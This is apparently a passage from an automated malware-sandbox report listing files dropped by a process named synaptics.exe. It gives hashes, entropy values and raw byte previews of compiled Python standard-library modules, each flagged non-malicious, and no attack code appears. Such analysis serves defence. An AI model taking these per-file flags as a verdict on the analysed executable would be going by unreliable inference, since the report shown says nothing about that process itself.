                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r...../C:\Users\user\Desktop\tmp\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r.........z.Vio
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1607
                                                                                                                                                                                                                Entropy (8bit):4.703741635730056
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:9Vtus1piprHUrYPyaGcLXaLOsJkLBBn1U:9buWwHUPNcLXaasmP1U
                                                                                                                                                                                                                MD5:A1DD347CA5E9DC6FB987B34840E7B818
                                                                                                                                                                                                                SHA1:1DCDF9F3DD8B3FEF0C91B324A9493E32050229D4
                                                                                                                                                                                                                SHA-256:F252E16172D43DD878DDCF9F42370C4994F03390884E241D1C3867E3810C5D62
                                                                                                                                                                                                                SHA-512:83453A972AD28389C665497EA48C00B964EDBF4366F419E327082B49BF0E2E03A23EDA3D9E74C75064746728EB3CA2113F4AE5A16BA739A84CA51A1C2126C428
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....0C:\Users\user\Desktop\tmp\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c....................@...r....)...Stream
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6426
                                                                                                                                                                                                                Entropy (8bit):5.8016181568164
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:7WZsdAA4kaBaNzpZOZBDcxHN/8O2OHb4k7:7RzpZOZBDcpNp2iT
                                                                                                                                                                                                                MD5:8992DBF4F6ECB516ECB0AD501EE1D26F
                                                                                                                                                                                                                SHA1:4E0F50451672CF74D7EB72C3F0B9CBD8BBFE4909
                                                                                                                                                                                                                SHA-256:00391EF7EA892708AA8010A275328A938E7A89CB41A5164EF0D6E1652A3EF58B
                                                                                                                                                                                                                SHA-512:09EF45B9E34888B22BF2BBE80621E4AD6ECE3929DEB9C4BF53E710DCEE7A8E245385C0EE1DFB7B87C0832FC838BEDDAEC79921DCD30C649682B9DE6C10F689DA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...IntEnum..HTTPStatusc....................@...s....e.Z.d.Z.d.Z.dDd.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCS.)Er....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. * RFC 7238: Permanent Redirect. * RFC 2295: Transparent Content Negotiation in HTTP. * RFC 2774: An HTTP Extension Framework. * RFC 7725: An HTTP Status Code to Rep
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):35188
                                                                                                                                                                                                                Entropy (8bit):5.3794640356404155
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:9oG3sy3gu5p4T9uaP5OvX/6aHpq//oUyt2iGYS9uj8Eqds:mG3rgu5p4T9u25OvX/6aHpg/gt2iGYSo
                                                                                                                                                                                                                MD5:BF164778572524D07A86E5BEFCF01B90
                                                                                                                                                                                                                SHA1:F6971F13DB113BBCF842E49E01D32277067A69F8
                                                                                                                                                                                                                SHA-256:25F5386F3C011D4FD7E2517935954722E6BCF4BE2CAA37AD64A8D532A85369BD
                                                                                                                                                                                                                SHA-512:CE4275D9332539C4037E4D92B799988613FA5750ACA17493632D49C0A0EB560651E4E8A14572D23EE425468599B3314489F0EA41BE6768E705DE76A40C60ED8D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sP...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.....e.j.j.....d.d...e.j.j.....D...Z.d.Z.d.Z.e...d...j.Z.e...d...j Z!e...d...Z"e...d...Z#h.d...Z$d?d.d...Z%G.d.d...d.e.j&j'..Z(d.d...Z)e(f.d.d...Z*G.d.d...d.e.j+..Z,G.d.d ..d ..Z-z.d.d.l.Z.W.n...e/y.......Y.n.w.G.d!d"..d"e-..Z0e..1d"....G.d#d$..d$e2..Z3G.d%d&..d&e3..Z4G.d'd(..d(e3..Z5G.d)d*..d*e3..Z6G.d+d,..d,e3..Z7G.d-d...d.e3..Z8G.d/d0..d0e3..Z9G.d1d2..d2e3..Z:G.d3d4..d4e:..Z;G.d5d6..d6e:..Z<G.d7d8..d8e:..Z=G.d9d:..d:e3..Z>G.d;d<..d<e3..Z?G.d=d>..d>e@e>..ZAe3ZBd.S.)@a....HTTP/1.1 client library..<intro stuff goes here>.<other stuff, too>..HTTPConnection goes through a number of "states", which define when a client.may legally make another request or fetch the response for a particular.request. This diagram details these state transitions:.. (null). |. | HTTPConnection(). v. Idle. |. | putr
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):53450
                                                                                                                                                                                                                Entropy (8bit):5.560787749907612
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:eB65TRGXx0wM1oyXc63+dpUTXcc5he57HfAqZ8K20oERqRGwFkEu58kvknKdVWV6:bAI1FXZ+bUQ8hlER6dg6hMT
                                                                                                                                                                                                                MD5:3F6B6B754FFB27C7096E52261A8D8A22
                                                                                                                                                                                                                SHA1:89B5275AA3FE74330C43379CD8EB19DD7CAB33A3
                                                                                                                                                                                                                SHA-256:598450FC0FE78DD97E6DAAFD8523C3F7900BB281971932B1C7511488FD77AFC2
                                                                                                                                                                                                                SHA-512:C970F83259F335F774424960CD17F51CF5DE5F78D14504360B7AE9FCCD9B2BDDB7F12F7ADF3D8A868221071F3AF9D81B322F13277FA1FC0FC4400B3E1C860416
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15348
                                                                                                                                                                                                                Entropy (8bit):5.445136626158563
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:nT6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:TWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                                                MD5:699C2DC20D5C401640BCC32CC643B6AD
                                                                                                                                                                                                                SHA1:81715F2ACEA3814A1D7F4B61EFF46AC6F22E3FA3
                                                                                                                                                                                                                SHA-256:3D236630D3B0281778487CB59E3A058AED48BC64675ED86EBA885FDE72E7DB28
                                                                                                                                                                                                                SHA-512:F405C7926BFC726AAFEEC516AE63D528602D791F843A9F61EA9EA322B0806F85B89AEE7007468B9515D241A50B038AF3912B03243D9A75D8F8987747580604A6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3815
                                                                                                                                                                                                                Entropy (8bit):5.535064732221013
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:euKEn4Gs1xwkB8EpIXEz66QncxK1p9W0j+VZzmF2Q8yIcOr:UEkroMK1a0j+DmF2QZIh
                                                                                                                                                                                                                MD5:F42503F1E54134E36C24CC25A16B6641
                                                                                                                                                                                                                SHA1:8861ADD86C519CF82FA42F8EF4C44CAFCA1FC9C4
                                                                                                                                                                                                                SHA-256:6F411D7DBD2D5913377E62A7C034C13115DFD13384D4B0FE21CCE36FE5F6D73D
                                                                                                                                                                                                                SHA-512:F2C67B0C01D1721BC7CF84E56279F31E041E1B2F40E3D36053945624A8F84AE550605BA2736515523173A10B6BADA966CEBA43C23AF545E14E56AE66365FDC34
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dy........................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y)......d.d.l.m.Z...e...e.e.....Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.yB......Y.n.w.e.e.j.d.<.z.d.d.l.Z.W.n...e.ye......d.d.l.m.Z...e...e.....e.e._.Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.y~......Y.n.w.e.e.j.d.<.e.j.Z.e.j.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.i.Z.d.d...Z.d.S.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....N.....)..._bootstrapz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py)..._bootstrap_externalz.importlib._bootstrap_externalz._bootstrap_external.py).r....c....................C...s"...t.j.D.].}.t.|.d...r.|.......q.d.S.).zmCall the invalidate_caches() method on all meta path finders stored in. sys.meta_path (where implemented).r....N)...sys..meta_path..hasattrr....)...finder..r.....3C:\Users\user\Desktop\tmp\lib\importlib\__init__.pyr....A...s..............r....c....................C...s....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1981
                                                                                                                                                                                                                Entropy (8bit):5.008316035682812
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:6GYO7KXEXsRXrqj9FXHRLSVRibTAsKhnsRyy:QrEXiXrqhFXHPTbIsZ
                                                                                                                                                                                                                MD5:16A1319C19E007A2AF08879662304E0B
                                                                                                                                                                                                                SHA1:8F762C37EC251C0D2C2FB24D5F2E2C7AD7DC1373
                                                                                                                                                                                                                SHA-256:2F828EE7688A63966D90485D25E5B64286BA3D48658BA526CAAB9013C8501BE2
                                                                                                                                                                                                                SHA-512:3852A2DACC7DACC61097E8698918D6777267865D6004650D74AC9E2D85B6F69AE1609327CB901C6B77391C5FF3CF584F3134BFDAAF62FE9AA8B927DF94CED3A9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dr........................@...s8...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.G.d.d...d.e.j.d...Z.d.S.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Loaderz'Abstract base class for import loaders.c....................C...s....d.S.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specr....r...../C:\Users\user\Desktop\tmp\lib\importlib\_abc.py..create_module....s......z.Loader.create_modulec....................C...s....t.|.d...s.t...t...|.|...S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properly. The fullname is a str... ImportError is raised on failure... T
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3713
                                                                                                                                                                                                                Entropy (8bit):4.656884172789373
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:KdiChyWa11p/5cIBqNU79FhTEnKIgVFKOmuD79VsUKyO9WoK/UML9Qa:yhyWGfxxB99FhkKIgDKONrsUK39WoK/L
                                                                                                                                                                                                                MD5:C479E9E8FC8EBDAAF24029DF651DA3FC
                                                                                                                                                                                                                SHA1:5955C550BB849D6AD66C752007915E03C1EFA651
                                                                                                                                                                                                                SHA-256:B63110EBE408E846AB2D5CB9F056F91FA0C38F5088D9E870DC7E0B3C7F64BF38
                                                                                                                                                                                                                SHA-512:68A78245EF93F1A72AC0B65380852EC54581058A26D50F3E8EA4A40FA93F0A80194600585594B1214112E209D36E898B6813F55C97DCE2E236A8B1ED780A168A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sN...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.S.)......)...suppress.....)...abcc....................@...s(...e.Z.d.Z.d.Z.d.d...f.d.d...Z.d.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c....................C...s....|.j.S...N)...loader....spec..r.....4C:\Users\user\Desktop\tmp\lib\importlib\_adapters.py..<lambda>....s......z.SpecLoaderAdapter.<lambda>c....................C...s....|.|._.|.|...|._.d.S.r....).r....r....)...selfr....Z.adapterr....r....r......__init__....s........z.SpecLoaderAdapter.__init__c....................C........t.|.j.|...S.r....)...getattrr......r......namer....r....r......__getattr__...........z.SpecLoaderAdapter.__getattr__N)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............r....c....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.)...TraversableResourcesLoaderz9. Adapt a loader to
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2977
                                                                                                                                                                                                                Entropy (8bit):5.1886772680175985
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:QfiZ38jH+kP4PY+IuYalBABDu0ZLmJ2SOoHft3XlY2s03f/mm2vJviUeXrowab:QfipsH3AfYali7ZL7dillY2s033mm2vX
                                                                                                                                                                                                                MD5:A061DB534DFC42C432D077E4D5584515
                                                                                                                                                                                                                SHA1:43A5056A9237C7A366ADD9FE52E5CDDFFF68E6DA
                                                                                                                                                                                                                SHA-256:851799797900928C5B00D8B5C52989E7A062072737092704F3E7CA7B33D4FA7B
                                                                                                                                                                                                                SHA-512:7CE64D3DB81D5A8604EE06DB73612AAD7C10828BF5F04822F55C492BB474C5173ACE96FDD8F05D01D1B3E7BCF76D75FFFFECB609CD759673B4040F7FA9EA68C3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.e.f...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.d.e.j.d...d.d.....Z.e.j.d.d.....Z.e...e.j...e.j.d.d.......Z d.S.)......N)...Union..Any..Optional.....)...ResourceReader..Traversable)...wrap_specc....................C...s....t.t.|.....S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...package..r.....2C:\Users\user\Desktop\tmp\lib\importlib\_common.py..files....s......r....c....................C...s....t.|...}.t.j...|...\.}.}.|.r.t.|...d.......|.S.).z.Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. z. must be only a file name)...str..os..path..split..ValueError).r....Z.str_path..parent..file_namer....r....r......normalize_path....s..............r....c....................C...s*...|.j.}.t.|.j.d.d...}.|.d.u.r.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15901
                                                                                                                                                                                                                Entropy (8bit):5.105790994792609
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:4ziB5HGaViuYo8vEVbFCibM/50LbCb1EVMXS6O9PzXDPJ8OoEAuDdPTaX/DOWP6s:4yDVnR8gC/50LbjVMA9PrWCDaX/P6s
                                                                                                                                                                                                                MD5:B4FA0F9E9A801AEFB4FAE9B7F582812E
                                                                                                                                                                                                                SHA1:814D7C53C4D7C36B18D3A58D841A017FB75C3C32
                                                                                                                                                                                                                SHA-256:1C28343531B44296AB19DE3B66DDB887651AAEF4B6FA59065D9B04C76CA55AF3
                                                                                                                                                                                                                SHA-512:749D80674774AF6BD50D7B23D983EE183E7C812C59AD73AD328BC5FE4B1B98A11DDDF6384F5CCCAF86B819F931FCDF9790F2EA7EAC98C7CA8EF40A0720051214
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.:.......................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y...Z...z.e.j.d.k.r"..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n...e.y@......e.Z.Y.n.w.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j.d...Z.G.d.d...d.e.j.d...Z.e.e.e.j.e.j.e.j.e.j.....G.d.d...d.e.j.d...Z.e.e.e.j.....G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.e.j.e.j.....G.d.d...d.e...Z.e.e.e.j ....G.d.d...d.e.j!e.e...Z!e.e!e.j"e.j#....G.d.d...d.e.j$e.e...Z$e.e$e.j"....G.d.d...d.e.j.d...Z%e.G.d.d ..d e.....Z&G.d!d"..d"e%..Z'd.S.)#z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...BinaryIO..Iterable..Text)...Protocol..runtime_checkablec....................G...sZ...|.D.](}.|...|.....t.d.u.r*z.t.t.|.j...}.W.n...t.y$......t.t.|.j...}.Y.n.w.|...|.....q.d.S...N)...registerr......getattr..__name__..AttributeError.._frozen_importlib_external).Z.abstract_clsZ.classes..clsZ.frozen_cls..r......C:\Users\user\D
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                Entropy (8bit):5.389842259172301
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:CXCkBAzUYcjBN/8XHmE16iGMwigQFM4u0LIX7OujdiXg8G94EDRXqnrmHO28sVtP:IjoXT16iGMJgQFpAquj8GXdXsrmH58K
                                                                                                                                                                                                                MD5:7AEA91A48FDE64BBAF91AC9846300A21
                                                                                                                                                                                                                SHA1:10063270237445B125AFD960DA8603ACEC3F49F0
                                                                                                                                                                                                                SHA-256:0C747954CD230F3F3A086176C82DA332B7BF21BD3DF71D3B35C4632BD7969293
                                                                                                                                                                                                                SHA-512:AB3EB184578AF3BBDEF6CDB1E1208F4AE829874F62B6E6FED66FD018D4F0FD8A30265A76F05C913B72B4653A58DC9FECEB6F4512BC800549BA67B05FED8D4112
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dR........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoaderc....................C...s....t.t...t...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r......r....r.....4C:\Users\user\Desktop\tmp\lib\importlib\machinery.py..all_suffixes....s......r....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......<module>....s............................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5192
                                                                                                                                                                                                                Entropy (8bit):4.8709695466155924
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:uPvdoTQ1zsquRgowzdmCbBavWMPTjTzKuhXBoPTl906kEt7IQ7ClEXsjMptAWrxB:pQ1ztyvedlbB7IruuhXBoPTlK9EhIQOi
                                                                                                                                                                                                                MD5:0DFDF7D5EBF6E0D157D89C2F533D2999
                                                                                                                                                                                                                SHA1:6BA06D0029CD91ABB7C3DE4EEC5FAFD3806A0C66
                                                                                                                                                                                                                SHA-256:324758BC73882153385466C11FCEB2070FA5728ED601C96ECB0586DDB307D75C
                                                                                                                                                                                                                SHA-512:F680F415585B33C917594892E0079CD23C76A73EFF5839FDC003A6339698F8188CF24C7B6F030ECAF0E53D9E1C35AD15A70419A4EF3E8417315A19E6BF5928DD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d~........................@...sx...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.)......N.....)...abcc....................C...s....t.t.j...|.....S...N)...iter..collections..OrderedDict..fromkeys)...items..r.....2C:\Users\user\Desktop\tmp\lib\importlib\readers.py..remove_duplicates...........r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FileReaderc....................C...s....t...|.j...j.|._.d.S.r....)...pathlib..Path..path..parent)...self..loaderr....r....r......__init__....s......z.FileReader.__init__c....................C........t.|.j...|.....S...z{. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. ....strr......joinpath..r......resourcer....r....r......resource_path...........z.FileReader.resource_pathc....................C........|.j.S.r......r......r....r....r....r......files...........z.FileReader
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5379
                                                                                                                                                                                                                Entropy (8bit):5.335340779703262
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:UzYSudPIqJNGeMzW9dlfxV60JJgFGx6qjBfjO6y3SnKL49oNhbMrhKgTlv:UJBnS9xV6SJgGx6AjI3SKyhRTlv
                                                                                                                                                                                                                MD5:2C9C7F8B5B663C9F1CF2D7CFDAE9B5A3
                                                                                                                                                                                                                SHA1:EB1A4B2B39430ED49FFD3A022CC67D9ECD055A71
                                                                                                                                                                                                                SHA-256:0CE48D766DB5A7EEC41DDC460484245DC54FB35E90ED97D1E69A476BE7D961B5
                                                                                                                                                                                                                SHA-512:EDB65C51BDC383957005334364B6FC9A820747DFC0A37D67C6191B6C721FABFCD34C8F540BDB862A0D4202689A786D3376401EA9909679EA4C8DC1CEE4BF4556
                                                                                                                                                                                                                Malicious:false
